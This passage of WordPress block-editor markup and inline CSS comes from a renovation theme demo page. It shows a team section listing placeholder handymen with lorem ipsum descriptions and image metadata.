767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"3ae9a34b-e7e2-43ff-99a6-51ffbdeca952\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\" rel=\"noopener noreferrer\" target=\"_blank\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n 